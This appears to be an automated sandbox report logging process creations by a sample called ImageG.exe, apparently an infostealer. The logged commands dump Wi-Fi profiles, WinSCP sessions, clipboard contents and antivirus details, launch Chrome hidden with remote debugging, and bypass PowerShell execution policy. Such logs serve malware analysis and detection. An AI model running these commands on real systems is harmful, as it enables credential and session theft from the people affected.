Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\error_script.ps1""
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe "C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\desenamoreis" --mojo-platform-channel-handle=2424 --field-trial-handle=1704,i,16015974932036603911,12011319821735698167,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid"
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 91.0.1 (x64 en-GB)""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6798C408-2636-448C-8AC6-F4E341102D27}""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7B981965-2FBC-433C-B4B3-E183EE97CD29}""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B652B695-C849-4EF2-B09A-72771C7AD2BA}""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "mullvad account get"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FO CSV /NH"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Format-List displayName, instanceGuid, pathToSignedProductExe, pathToSignedReportingExe, productState, timestamp""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\RpfMwk5hAFqJ_tezmp.ps1""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /PID 9048 /FJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --window-position=-2400,-2400Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic process where processid=7896 get ExecutablePath
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe NET SESSION
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"
        Source: C:\Windows\System32\net.exe | Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 SESSION
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\error_script.ps1"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\HomeBusiness2019Retail - en-us"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 91.0.1 (x64 en-GB)"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6798C408-2636-448C-8AC6-F4E341102D27}"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7B981965-2FBC-433C-B4B3-E183EE97CD29}"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B652B695-C849-4EF2-B09A-72771C7AD2BA}"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO CSV /NH
